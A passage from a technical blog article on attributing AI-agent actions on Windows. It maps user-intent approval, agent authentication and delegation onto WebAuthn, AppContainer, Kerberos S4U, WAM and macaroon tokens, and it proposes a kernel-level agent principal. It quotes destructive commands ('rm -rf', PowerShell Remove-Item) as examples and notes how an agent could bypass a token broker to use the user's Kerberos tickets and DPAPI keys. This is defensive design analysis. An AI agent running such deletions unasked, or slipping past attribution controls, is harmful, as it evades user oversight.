&lt;h2&gt;6. Mapping the three pillars onto Windows primitives&lt;/h2&gt;
&lt;p&gt;One section. Three sub-sections, one per pillar. For each: the existing Windows primitive, the API surface that exposes it, and the missing glue that turns it into a pillar-compatible building block.&lt;/p&gt;
&lt;h3&gt;6.1 Pillar 1: Verifiable User Instructions on Windows&lt;/h3&gt;
&lt;p&gt;The substrate exists in user mode and lives in &lt;code&gt;webauthn.dll&lt;/code&gt;, the &lt;a href=&quot;https://paragmali.com/blog/webauthn-and-passkeys-on-windows-from-ctap-to-the-credential/&quot; rel=&quot;noopener&quot;&gt;Win32 platform-authenticator entry point&lt;/a&gt;. Microsoft Learn describes it verbatim: &quot;Provides Win32 apps with APIs for communicating to Windows Hello and external security keys as part of WebAuthN and CTAP specifications&quot; [@ms-learn-webauthn-api]. Windows Hello provides the TPM-rooted user-verification gesture: &quot;credentials are asymmetric and generated within isolated environments of TPMs&quot; [@ms-learn-hello]. The credential provider model in Winlogon, the passkey provider plug-in model in Windows 11 24H2, and per-relying-party passkey isolation in Windows Hello for Business round out the platform-authenticator surface.&lt;/p&gt;
&lt;p&gt;What is missing is a Windows-native &lt;em&gt;agent action approval&lt;/em&gt; UI surface. Today&apos;s pieces let a relying party in the browser ask the user to authenticate to that relying party; they do not let a locally-installed agent ask the user to authorise a specific action (&quot;approve $50 to vendor X&quot;; &quot;approve &lt;code&gt;rm -rf .\old-builds&lt;/code&gt;&quot;) by minting a per-action, intent-bound delegation token signed by the user&apos;s passkey with replay protection and a TTL measured in seconds. The Pillar 1 wire format AATWG is developing is exactly this kind of token; the Windows-side glue would land it as a system UI surface (analogous to UAC, but minting a passkey assertion rather than escalating an integrity level), wired into the WebAuthn platform authenticator and audited via ETW.&lt;/p&gt;

The Windows-resident OAuth token broker that ships with the operating system. WAM acts as an authentication broker on Windows 10 1703 and later; &quot;WAM ensures that the refresh tokens are device bound and enables apps to acquire device bound access tokens&quot; [@ms-learn-wam]. WAM is the on-device credential broker for Microsoft Entra ID; it does not work with third-party identity providers as of May 2026.
&lt;h3&gt;6.2 Pillar 2: Agent Authentication on Windows&lt;/h3&gt;
&lt;p&gt;The kernel substrate is AppContainer plus the package SID. The verbatim Microsoft Learn dual-principal model is the load-bearing citation: &quot;the permitted access is the intersection of that granted by the user/group SIDs and AppContainer SIDs&quot; [@ms-learn-appcontainer]. The cryptographic binding from binary to package is Authenticode signing the file [@ms-news-authenticode-1996; @wikipedia-codesign] and App Control for Business as the policy gating the loader [@ms-learn-appcontrol]. The privacy-preserving agent-class attestation primitive is &lt;a href=&quot;https://paragmali.com/blog/direct-anonymous-attestation-the-zero-knowledge-proof-alread/&quot; rel=&quot;noopener&quot;&gt;Direct Anonymous Attestation&lt;/a&gt;, defined in the TPM 2.0 Library Specification by the Trusted Computing Group; the corpus&apos;s sibling DAA article describes the protocol in detail, and the verbatim TCG specification language is sourced there.&lt;/p&gt;

A TPM 2.0 protocol that lets a device prove membership in a privacy-preserving group without revealing the specific device identity. In the agent setting, DAA would let an agent vendor prove &quot;this binary is a member of the *signed Claude Desktop* class&quot; without revealing which specific desktop installation is making the call. The protocol&apos;s group-signature mathematics is the load-bearing primitive.
&lt;p&gt;What is missing on Windows is a kernel-recognised &lt;code&gt;AgentPrincipal&lt;/code&gt; that downstream consumers treat as first-class. Today the package SID is the closest signal; it is also category-incorrect, because the package SID represents a package, not an agent role. An &lt;code&gt;AgentPrincipal&lt;/code&gt; would be a third token-resident SID alongside the user SID and the package SID, with its own ACL slot in opt-in DACLs, its own &lt;code&gt;SubjectAgentSid&lt;/code&gt; field in &lt;code&gt;SeAccessCheck&lt;/code&gt; audit events, its own ETW header alongside &lt;code&gt;SubjectUserSid&lt;/code&gt;, its own RPC binding-handle metadata, and its own claim in the access tokens WAM mints. Defender, EDR, on-device Conditional Access -- every consumer that today reads the user SID would gain a sibling field.&lt;/p&gt;

The dominant deployment pattern for AI agents on Windows desktops in May 2026 is Electron plus an NSIS or MSI per-user installer, not MSIX plus the AppContainer kernel substrate. Claude Desktop, ChatGPT Desktop, and Cursor all ship through this Electron path; GitHub Copilot CLI ships as a Node.js CLI via npm (`@github/copilot`), WinGet (`GitHub.Copilot`), or an MSI installer from the github/copilot-cli GitHub Releases page, which is a different non-MSIX-packaged path but is structurally equivalent for the purposes of this article -- no package SID, no AppContainer kernel substrate, primary token traces to the user. Each of them runs under the user&apos;s primary token without a package SID; the WebAuthn platform authenticator is available to them via `webauthn.dll`, but the kernel-substrate dual-principal model under AppContainer is not.&lt;p&gt;Win32 App Isolation, announced in public preview on June 14, 2023, is the in-flight retrofit. The launch blog describes it directly: &quot;We are thrilled to announce the public preview launch of Win32 app isolation ... Win32 app isolation is built on the foundation of AppContainers ... AppContainer, which is recognized as a security boundary by Microsoft&quot; [@ms-blogs-win32appiso]. Adoption among agent vendors three years later is minimal; the Pillar 2 substrate exists, but the deployment substrate that would carry it does not.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;6.3 Pillar 3: Trusted Delegation for Commerce on Windows&lt;/h3&gt;
&lt;p&gt;The act-on-behalf-of primitive on Windows is &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos S4U2Self and S4U2Proxy&lt;/a&gt;, formally specified in Microsoft&apos;s MS-SFU Kerberos Protocol Extensions [@ms-learn-mssfu]. S4U2Self lets a service obtain a service ticket for a user without that user&apos;s password (the &quot;for&quot; half); S4U2Proxy lets the service then present that ticket to a back-end service on the user&apos;s behalf (the &quot;proxy&quot; half). Resource-Based Constrained Delegation is the modern policy form: the back-end service authors which front-end services may delegate to it. Protected Users, Authentication Policies, and Authentication Silos are the policy plumbing. WAM is the on-device token broker for Entra-side delegation [@ms-learn-wam]; Microsoft&apos;s OAuth 2.0 On-Behalf-Of flow [@ms-learn-obo-flow] is the cloud analog.&lt;/p&gt;

Microsoft&apos;s Kerberos Protocol Extensions, formalised in MS-SFU, that let a server obtain a service ticket on behalf of a user without that user&apos;s password (S4U2Self) and then present that ticket to a back-end service (S4U2Proxy). They are the act-on-behalf-of primitive on Windows [@ms-learn-mssfu]. Resource-Based Constrained Delegation refines the policy: the back-end resource names the front-end services it accepts delegation from.
&lt;p&gt;What is missing is a Macaroons-style mintable, attenuable, revocable capability-token format scoped to a per-tool allow-list. Macaroons were introduced by Birgisson, Politz, Erlingsson, Taly, Vrable, and Lentczner at NDSS 2014 (February 22, 2014) [@macaroons-ndss; @macaroons-gr]. The verbatim positioning from the Google Research abstract is the load-bearing description: &quot;macaroons are bearer credentials, like Web cookies, macaroons embed caveats that attenuate and contextually confine when, where, by who, and for what purpose a target service should authorize requests&quot; [@macaroons-gr]. The construction is a chained HMAC: a fresh HMAC of the previous HMAC plus a caveat. Any holder can append a caveat, derive a strictly weaker macaroon, and present it to a verifier; the verifier walks the chain, checks each caveat against its policy, and verifies the final HMAC against the issuer&apos;s secret.&lt;/p&gt;

Birgisson, Politz, Erlingsson, Taly, Vrable, and Lentczner at NDSS 2014 [@macaroons-ndss]. A bearer credential constructed as a chained HMAC over caveats; any holder can derive a strictly weaker credential by appending a caveat without round-tripping the issuer, but cannot derive a stronger one. The attenuation property is what makes macaroons the natural format for per-tool agent capabilities [@macaroons-gr].
&lt;p&gt;In a Windows-shipping Pillar 3 implementation, the agent would not present the user&apos;s TGT to a downstream tool. The agent would present a macaroon issued at agent-install time -- attenuated to the specific tools the user authorised through a Pillar 1 Verifiable User Instructions flow -- and the tool would verify the macaroon plus an ETW emission carrying both &lt;code&gt;SubjectUserSid&lt;/code&gt; and &lt;code&gt;SubjectAgentSid&lt;/code&gt;. Revocation would land at the issuer (the WAM-resident macaroon authority), with a Continuous Access Evaluation analog fanning out to local token caches without logging the user out.&lt;/p&gt;

flowchart LR
    subgraph P1G[&quot;Pillar 1: Verifiable User Instructions&quot;]
        P1S[&quot;Substrate: webauthn.dll, Windows Hello, passkey provider&quot;]
        P1M[&quot;Missing: agent-action approval UI minting intent-bound delegation tokens&quot;]
        P1S --&amp;gt; P1M
    end
    subgraph P2G[&quot;Pillar 2: Agent Authentication&quot;]
        P2S[&quot;Substrate: AppContainer package SID, Authenticode, App Control, TPM 2.0 DAA, Pluton&quot;]
        P2M[&quot;Missing: kernel-recognised AgentPrincipal across SeAccessCheck, ETW, RPC, Defender, CA&quot;]
        P2S --&amp;gt; P2M
    end
    subgraph P3G[&quot;Pillar 3: Trusted Delegation for Commerce&quot;]
        P3S[&quot;Substrate: Kerberos S4U2Proxy, RBCD, WAM, OBO flow, ETW&quot;]
        P3M[&quot;Missing: Macaroons-style attenuable capability tokens plus AgentPrincipalSid in ETW&quot;]
        P3S --&amp;gt; P3M
    end
&lt;p&gt;The proposed access-check sequence is the second load-bearing diagram. Picture an agent in its own AppContainer, with its own package SID, holding a macaroon scoped to one tool. The agent calls the tool; WAM intercepts; if the action requires fresh user verification, Hello mints a passkey assertion; &lt;code&gt;SeAccessCheck&lt;/code&gt; evaluates user SID, package SID, and the proposed agent SID; ETW emits the dual-principal record.&lt;/p&gt;

sequenceDiagram
    participant Agent as Agent process
    participant WAM as WAM broker
    participant Hello as Windows Hello
    participant Kernel as SeAccessCheck
    participant ETW as ETW provider
    Agent-&amp;gt;&amp;gt;WAM: request tool access with macaroon
    WAM-&amp;gt;&amp;gt;WAM: verify macaroon chain
    WAM-&amp;gt;&amp;gt;Hello: if intent required, mint fresh assertion
    Hello--&amp;gt;&amp;gt;WAM: passkey assertion
    WAM-&amp;gt;&amp;gt;Kernel: assemble token (user SID, package SID, agent SID)
    Kernel-&amp;gt;&amp;gt;Kernel: access check with three principals
    Kernel--&amp;gt;&amp;gt;Agent: granted or denied
    Kernel-&amp;gt;&amp;gt;ETW: emit dual-principal record
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pillar&lt;/th&gt;
&lt;th&gt;Windows substrate that already ships&lt;/th&gt;
&lt;th&gt;API surface&lt;/th&gt;
&lt;th&gt;Missing glue&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;1: Verifiable User Instructions&lt;/td&gt;
&lt;td&gt;&lt;code&gt;webauthn.dll&lt;/code&gt;, Windows Hello, passkey provider&lt;/td&gt;
&lt;td&gt;Win32 WebAuthn API; Hello credential provider&lt;/td&gt;
&lt;td&gt;Agent-action approval UI; intent-bound passkey delegation tokens with short TTL&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;2: Agent Authentication&lt;/td&gt;
&lt;td&gt;AppContainer + package SID, Authenticode + App Control, TPM 2.0 DAA, Pluton attestation&lt;/td&gt;
&lt;td&gt;NtCreateLowBoxToken; LSASS package-SID assignment; TPM attestation&lt;/td&gt;
&lt;td&gt;Kernel-recognised &lt;code&gt;AgentPrincipal&lt;/code&gt; across &lt;code&gt;SeAccessCheck&lt;/code&gt;, ETW, RPC, Defender, on-device CA&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;3: Trusted Delegation for Commerce&lt;/td&gt;
&lt;td&gt;Kerberos S4U2Self/S4U2Proxy, RBCD, WAM, OBO flow, ETW&lt;/td&gt;
&lt;td&gt;MS-SFU; MSAL WAM broker; Entra OBO token endpoint&lt;/td&gt;
&lt;td&gt;Macaroons-style per-tool capability tokens; &lt;code&gt;AgentPrincipalSid&lt;/code&gt; ETW field; CAE-style fan-out for revocation&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Deployment pattern&lt;/th&gt;
&lt;th&gt;Token at runtime&lt;/th&gt;
&lt;th&gt;Where DPAPI lives&lt;/th&gt;
&lt;th&gt;Network privilege&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Non-MSIX user-mode (Claude Desktop / Cursor / ChatGPT Desktop: Electron + NSIS; Copilot CLI: Node.js + npm / WinGet / MSI)&lt;/td&gt;
&lt;td&gt;User primary token; no package SID&lt;/td&gt;
&lt;td&gt;User DPAPI scope (decryptable by any process under the same user)&lt;/td&gt;
&lt;td&gt;Full user network privilege; user TGT available&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MSIX-packaged AppContainer (Microsoft Copilot for Windows)&lt;/td&gt;
&lt;td&gt;LowBox token with package SID; integrity level usually Low&lt;/td&gt;
&lt;td&gt;Per-package DPAPI scope (isolated from other packages)&lt;/td&gt;
&lt;td&gt;Capability-gated network egress per app manifest&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;So the substrate is largely on the box. The glue is not. What competing approaches already ship -- and which one wins?&lt;/p&gt;
&lt;h2&gt;7. Where the principal lives: three positions&lt;/h2&gt;
&lt;p&gt;Three architectural positions are already shipping enough code that &quot;which one wins&quot; is a real question. Each picks a different layer to host the agent principal: the cloud, the operating system, or the on-device token broker.&lt;/p&gt;
&lt;h3&gt;7.1 Cloud-only&lt;/h3&gt;
&lt;p&gt;Agent identity lives in the identity provider. Microsoft&apos;s Entra Agent ID is the reference design: agents are first-class directory objects, with their own client credentials, sign-in logs, Conditional Access policies, and audit trail in Purview [@ms-learn-agentid]. When an agent needs to call a back-end API on a user&apos;s behalf, it uses RFC 8693 Token Exchange [@ietf-rfc-8693] or Microsoft&apos;s OAuth 2.0 On-Behalf-Of flow [@ms-learn-obo-flow] to exchange the user&apos;s token for an actor-claim-carrying access token; the back-end API consumes the &lt;code&gt;act&lt;/code&gt; and &lt;code&gt;may_act&lt;/code&gt; claims to attribute the call.&lt;/p&gt;
&lt;p&gt;Pros: works today, no kernel change, no Windows update required. The plumbing is fully specified at IETF [@ietf-rfc-8693; @ietf-rfc-9728; @ietf-oauth-v2-1], the Microsoft documentation is live [@ms-learn-agentoauth; @ms-learn-agentobo], and the directory exists [@ms-learn-agentid]. Cons: the OS never sees an agent principal. Every local file action, every DPAPI decrypt, every Kerberos ticket use, every RPC call inside the device collapses to the user identity. On-device endpoint detection cannot attribute. Continuous Access Evaluation knows the agent has been revoked in the cloud but cannot purge the user&apos;s local Kerberos cache or local DPAPI-protected secrets without logging the user out.&lt;/p&gt;
&lt;p&gt;Microsoft Learn makes the cloud-only constraint explicit: &quot;Agents aren&apos;t supported for OBO (&lt;code&gt;/authorize&lt;/code&gt;) flows. Supported grant types are &lt;code&gt;client_credential&lt;/code&gt;, &lt;code&gt;jwt-bearer&lt;/code&gt;, and &lt;code&gt;refresh_token&lt;/code&gt;&quot; [@ms-learn-agentobo]. Agent identities are confidential clients only [@ms-learn-agentoauth]; the interactive-flow path used by browser-based delegation is not available to agent entities. Cloud-only works precisely because the agent never tries to participate in a desktop user-verification gesture. AzureFeeds (January 28, 2026) records the practical consequences for Conditional Access: agent authentication is &quot;purely machine-driven&quot; with no MFA prompt, no device check, and no authentication-strength evaluation [@azurefeeds-caagent].&lt;/p&gt;
&lt;h3&gt;7.2 OS-only&lt;/h3&gt;
&lt;p&gt;Hypothetical, not shipping. The kernel access-check, ETW, and RPC ACLs all carry an agent SID distinct from the user SID. Every event the kernel emits gets a &lt;code&gt;SubjectAgentSid&lt;/code&gt; field next to the existing &lt;code&gt;SubjectUserSid&lt;/code&gt;. The access check is a three-way intersection: user SID, package SID, agent SID. Capability SIDs gate per-resource consent the way they do today for UWP apps.&lt;/p&gt;
&lt;p&gt;Pros: native attribution at every layer. EDR products read the agent SID directly from the kernel-supplied event header. File-system DACLs gain an explicit &quot;deny the agent, allow the user&quot; expression. On-device Conditional Access can refuse to release a DPAPI-protected secret if the requesting process carries an agent SID that has been revoked in Entra. Cons: requires a kernel-level change and a packaging story for non-MSIX agents (Electron in particular, the dominant deployment pattern). Without the packaging story, the kernel substrate exists but the deployment substrate does not.&lt;/p&gt;
&lt;h3&gt;7.3 Token broker&lt;/h3&gt;
&lt;p&gt;WAM extended with an agent-scoped token cache. The OS holds agent-scoped, attenuable tokens that any local agent process must mint from before calling a downstream API. The principal in the OS is still the user, but the &lt;em&gt;token&lt;/em&gt; the agent presents to each downstream consumer is scoped to the agent.&lt;/p&gt;
&lt;p&gt;Pros: reuses existing WAM plumbing [@ms-learn-wam]. WAM already binds refresh tokens to the device&apos;s TPM. Adding an agent-scope cache is plumbing, not architecture. Cons: cooperative. A malicious or buggy agent can bypass the broker and fall back to the user&apos;s TGT in the local Kerberos cache, the user&apos;s DPAPI master keys, or the user&apos;s network privileges. The broker can only attribute the agents that choose to be attributed.&lt;/p&gt;

A bearer OAuth access token, in OAuth 2.0 and OAuth 2.1, is a credential the bearer presents to a resource server; the server consults the issuer (via introspection or JWT signature verification) and accepts or rejects. Adding a new constraint means going back to the authorisation server and asking for a new token with the new constraint applied. Round-trip required.&lt;p&gt;A macaroon attenuates without a round-trip. The holder appends a caveat (&quot;only for tool X&quot;, &quot;only until 2026-05-25T15:00:00Z&quot;, &quot;only with body hash matching &lt;code&gt;sha256:...&lt;/code&gt;&quot;) and a fresh HMAC of the previous HMAC plus the caveat text. The verifier walks the chain, checks each caveat against its policy, and verifies the final HMAC against the issuer&apos;s secret. The holder cannot un-attenuate; the issuer does not have to be online. That property -- attenuation without a round-trip, by any party in the chain -- is what makes macaroons the natural format for per-tool agent capabilities [@macaroons-ndss; @macaroons-gr].
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;h3&gt;7.4 Three live spec families that complicate the picture&lt;/h3&gt;
&lt;p&gt;Three protocol families are racing in parallel and the article will not pretend any one is the obvious winner.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Anthropic&apos;s Model Context Protocol authorisation profile.&lt;/strong&gt; Revision 2025-11-25 is the current authoritative profile [@anthropic-mcp-2025-11-25], and the MCP specification index confirms 2025-11-25 as the latest pointer [@anthropic-mcp-index]. The opening sentence makes the design choice explicit: &quot;Authorization is OPTIONAL for MCP implementations. When supported: Implementations using an HTTP-based transport SHOULD conform to this specification. Implementations using an STDIO transport SHOULD NOT follow this specification, and instead retrieve credentials from the environment&quot; [@anthropic-mcp-2025-11-25]. The HTTP profile is OAuth 2.1 [@ietf-oauth-v2-1] plus RFC 9728 [@ietf-rfc-9728] for resource metadata, with PKCE mandatory and dynamic client registration optional.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Google AP2 plus Mastercard Verifiable Intent.&lt;/strong&gt; The W3C Verifiable Credential-shaped mandate ladder for agent-initiated commerce [@ap2-protocol; @ap2-github; @ap2-cloud-blog; @vi-dev; @w3c-vc-2]. The September 2025 launch vocabulary used Intent / Cart / Payment mandates [@ap2-cloud-blog]; the current v0.2 spec uses Checkout (Open / Closed) and Payment (Open / Closed) [@ap2-protocol]. The April 28, 2026 FIDO donation moves the spec to multi-vendor governance [@ap2-blog-google].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The IETF individual draft for agents on behalf of users.&lt;/strong&gt; &lt;code&gt;draft-oauth-ai-agents-on-behalf-of-user&lt;/code&gt; by Thilina Senarath and Ayesha Dissanayaka [@ietf-draft-agentoauth]. The current revision introduces the &lt;code&gt;requested_actor&lt;/code&gt; parameter in authorisation requests and the &lt;code&gt;actor_token&lt;/code&gt; parameter in token requests to authenticate the agent during code-to-token exchange [@ietf-draft-agentoauth]. The original -00 revision used &lt;code&gt;requested_agent&lt;/code&gt; and defined an explicit grant type &lt;code&gt;urn:ietf:params:oauth:grant-type:agent-authorization_code&lt;/code&gt; [@ietf-draft-agentoauth-00]; the parameter rename is documented and recent. The draft is an individual submission, not yet a working-group document.&lt;/li&gt;
&lt;/ul&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Position&lt;/th&gt;
&lt;th&gt;Principal lives in&lt;/th&gt;
&lt;th&gt;Token format&lt;/th&gt;
&lt;th&gt;Revocation surface&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Cloud-only (Entra Agent ID + RFC 8693)&lt;/td&gt;
&lt;td&gt;Entra directory&lt;/td&gt;
&lt;td&gt;JWT with &lt;code&gt;act&lt;/code&gt; claim&lt;/td&gt;
&lt;td&gt;Sign-in policy + CAE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OS-only (hypothetical AgentPrincipal)&lt;/td&gt;
&lt;td&gt;Kernel access token&lt;/td&gt;
&lt;td&gt;Token-resident SID&lt;/td&gt;
&lt;td&gt;Local SID purge + Defender&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Token broker (WAM extended)&lt;/td&gt;
&lt;td&gt;WAM cache (TPM-bound)&lt;/td&gt;
&lt;td&gt;Macaroon or signed capability&lt;/td&gt;
&lt;td&gt;WAM eviction + macaroon allow-list&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;MCP authorisation profile&lt;/td&gt;
&lt;td&gt;MCP server&apos;s IdP&lt;/td&gt;
&lt;td&gt;OAuth 2.1 bearer&lt;/td&gt;
&lt;td&gt;OAuth introspection&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AP2 plus Verifiable Intent&lt;/td&gt;
&lt;td&gt;Mandate issuer&lt;/td&gt;
&lt;td&gt;SD-JWT VC chain&lt;/td&gt;
&lt;td&gt;Mandate revocation registry&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;IETF agent-OBO draft&lt;/td&gt;
&lt;td&gt;Authorisation server&lt;/td&gt;
&lt;td&gt;JWT with &lt;code&gt;actor_token&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;OAuth introspection&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Most of the primitives exist on Windows today: AppContainer package SIDs, Kerberos S4U2Proxy, WebAuthn and Windows Hello, TPM 2.0 Direct Anonymous Attestation, the Administrator-Protection separate-session pattern, WAM, ETW. What does not exist is the coherent glue -- a kernel-recognised &lt;code&gt;AgentPrincipal&lt;/code&gt; that downstream consumers treat as first-class. The article&apos;s position is that agent identity belongs at both the cloud layer and the OS layer, with the OS layer being the missing piece in May 2026. The cloud layer makes Conditional Access work; the OS layer makes endpoint detection work; both are necessary; neither is sufficient.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Even the union of all three positions has structural ceilings. What are the limits no engineering can buy?&lt;/p&gt;
&lt;h2&gt;8. Three ceilings no engineering can buy&lt;/h2&gt;
&lt;p&gt;Three structural ceilings constrain every agent-attribution architecture, regardless of which of the three positions wins.&lt;/p&gt;
&lt;h3&gt;8.1 The semantic-intent ceiling&lt;/h3&gt;
&lt;p&gt;No cryptographic primitive can distinguish &quot;the user wanted the agent to delete this file&quot; from &quot;the user wanted to delete this file&quot; once both calls go through the same syscall. The OS sees bytes, not intent. The strongest architecture binds each intent to a fresh user-verification gesture (passkey plus Hello); at the limit, this requires one gesture per syscall, which is operationally unusable. The practical optimum is &lt;em&gt;batched intent&lt;/em&gt; traded off against &lt;em&gt;granularity of audit&lt;/em&gt;: the user authorises a session-scoped delegation (&quot;for the next 20 minutes, this agent may modify files under &lt;code&gt;.\old-builds&lt;/code&gt;&quot;), the system mints a macaroon attenuated to that scope, and the audit log records the macaroon issuance plus every syscall it gates. The intent is bounded by the scope of the gesture; the audit reconstructs intent after the fact from scope plus action.&lt;/p&gt;
&lt;h3&gt;8.2 The Confused-Deputy ceiling&lt;/h3&gt;
&lt;p&gt;Hardy 1988, in the verbatim formulation that began the genealogy. &quot;The fundamental problem is that the compiler runs with authority stemming from two sources. (That&apos;s why the compiler is a confused deputy.) ... The compiler had no way of expressing these intents!&quot; [@hardy-caplore]. Any system that grants a deputy ambient authority -- authority derived from multiple sources without the deputy being able to name &lt;em&gt;which&lt;/em&gt; authority it intends to exercise for a given action -- is structurally susceptible to confused-deputy attacks. Capability-style attenuation (macaroons, capability SIDs in AppContainer) mitigates by forcing the deputy to name the authority on every call; it does not eliminate, because a deputy that holds two authorities can be tricked into presenting the wrong one if the protocol does not require the relying party to verify the intent.&lt;/p&gt;
&lt;h3&gt;8.3 The &quot;running as the user&quot; ceiling and the MSRC servicing-criteria rule&lt;/h3&gt;
&lt;p&gt;As long as the agent process runs under the user&apos;s primary token, the agent inherits the user&apos;s TGT, the user&apos;s DPAPI master keys, and the user&apos;s network privileges by construction. That inheritance is what makes attribution collapse. The proposed remedy in Section 6 is an &lt;code&gt;AgentPrincipal&lt;/code&gt; that lives next to the user SID in the same token. The remedy depends on whether the Windows Security Response Center treats user-versus-agent as a defended security boundary.&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;MSRC servicing criteria document&lt;/a&gt; defines the boundary taxonomy. The verbatim opening: &quot;Does the vulnerability violate the goal or intent of a security boundary or a security feature? ... A security boundary provides a logical separation between the code and data of security domains with different levels of trust&quot; [@ms-msrc-servicing]. The same document gives the kernel-mode-versus-user-mode separation as the canonical example of a security boundary, and that example is the article&apos;s anchor for what counts as a security boundary under current MSRC policy. By inference from the boundary taxonomy table, &lt;em&gt;within the same logon session and the same primary token&lt;/em&gt;, a defect that requires the attacker to already be running as the user does not, by default, constitute a violation of a security boundary -- it is, under the criteria, a defense-in-depth concern rather than a CVE-eligible servicing event.&lt;/p&gt;

The MSRC document is the governance object that fixes the rule. For an OS-level `AgentPrincipal` to be a defensible boundary -- and therefore for an agent-bypass to qualify as a CVE-eligible servicing event -- the document itself would have to be amended to add the user-versus-agent split to the boundary taxonomy.&lt;p&gt;That is not an engineering ask. It is a governance ask. Microsoft has amended the document before (AppContainer was added to the security-boundary list during the Windows 10 era; Win32 App Isolation is built on the foundation of AppContainers, &quot;which is recognized as a security boundary by Microsoft&quot; [@ms-blogs-win32appiso]). The amendment is possible. It is not obviously imminent. As of May 2026 the MSRC document does not contain agent-related boundary language.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;That third ceiling lands the shift. The deepest part of the gap is not engineering -- it is &lt;em&gt;policy&lt;/em&gt;. The engineering substrate is more or less in place; the governance posture is not. An OS-level &lt;code&gt;AgentPrincipal&lt;/code&gt; either becomes a new defended boundary (a major policy shift) or ships as a feature without boundary semantics (no CVE eligibility for agent-bypass). The Confused-Deputy ceiling is the structural mirror of the same observation: the only mitigation a deputy can perform is to &lt;em&gt;name&lt;/em&gt; the two authorities at the access-check, which is what &lt;code&gt;AgentPrincipal&lt;/code&gt; would do.&lt;/p&gt;
&lt;p&gt;Given the structural ceilings, what specifically is still open in May 2026?&lt;/p&gt;
&lt;h2&gt;9. Seven open problems&lt;/h2&gt;
&lt;p&gt;Seven numbered, unsolved problems as of May 2026. None of them are blocked by physics; all of them are blocked by some combination of plumbing, packaging convention, and policy.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The state-of-the-art inventory this article rests on names seven open problems; an earlier pass listed six and missed the methodological one (no shared cross-method benchmark). The seventh is restored at the end of this section, and three of the existing problems (cross-process delegation, signed-binary harvesting, and the DAA deployment chain) are walked through in worked-example form using kernel and TPM primitives the prior sections have named.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.1 The Electron and Win32 packaging gap&lt;/h3&gt;
&lt;p&gt;Claude Desktop, ChatGPT Desktop, and Cursor are Electron and NSIS-installed apps; GitHub Copilot CLI is a Node.js CLI distributed via npm, WinGet, or MSI. None of them ships as MSIX. The package SID surface from AppContainer does not reach them; nothing in their primary token marks them as an agent class. Win32 App Isolation [@ms-blogs-win32appiso] is the in-flight retrofit -- adoption among agent vendors three years after the public preview is minimal. Until the dominant agent vendors ship under MSIX or Win32 App Isolation, the only kernel-level identifier the Pillar 2 substrate can grab onto does not exist for the agents readers actually have installed.&lt;/p&gt;
&lt;h3&gt;9.2 Cross-process delegation: a worked example&lt;/h3&gt;
&lt;p&gt;The failure mode lives at the kernel layer and is invisible from the source code of the agent. Claude Desktop on Windows 11 24H2 is a non-MSIX, NSIS-installed Electron binary whose primary process runs under the user&apos;s primary token. When that process calls &lt;code&gt;CreateProcessW(L&quot;powershell.exe&quot;, L&quot;-NoProfile -Command \&quot;Remove-Item ...\&quot;&quot;, ...)&lt;/code&gt; to shell out, the kernel side of &lt;code&gt;NtCreateUserProcess&lt;/code&gt; calls &lt;code&gt;PspAllocateProcess&lt;/code&gt;, which calls into the security reference monitor to assign a primary token to the child. By default -- when the caller passes neither a replacement token through &lt;code&gt;CreateProcessAsUserW&lt;/code&gt; nor a &lt;code&gt;PROC_THREAD_ATTRIBUTE_SECURITY_CAPABILITIES&lt;/code&gt; entry in &lt;code&gt;STARTUPINFOEX::lpAttributeList&lt;/code&gt; -- the kernel duplicates the parent&apos;s primary token verbatim. Microsoft Learn is explicit: &quot;The new process runs in the security context of the calling process&quot; [@ms-learn-createproc]. The child inherits the user&apos;s SID, the user&apos;s group SID list, the user&apos;s privileges, the medium integrity level, and the per-session logon SID. No &lt;code&gt;TokenAppContainerSid&lt;/code&gt; is present (&lt;code&gt;GetTokenInformation(..., TokenIsAppContainer, ...)&lt;/code&gt; returns zero); no &lt;code&gt;TokenPackageClaims&lt;/code&gt; field is present. There is no field anywhere in the child&apos;s primary token that distinguishes &quot;this PowerShell child was launched by Claude Desktop&quot; from &quot;this PowerShell child was launched by Notepad.&quot;&lt;/p&gt;
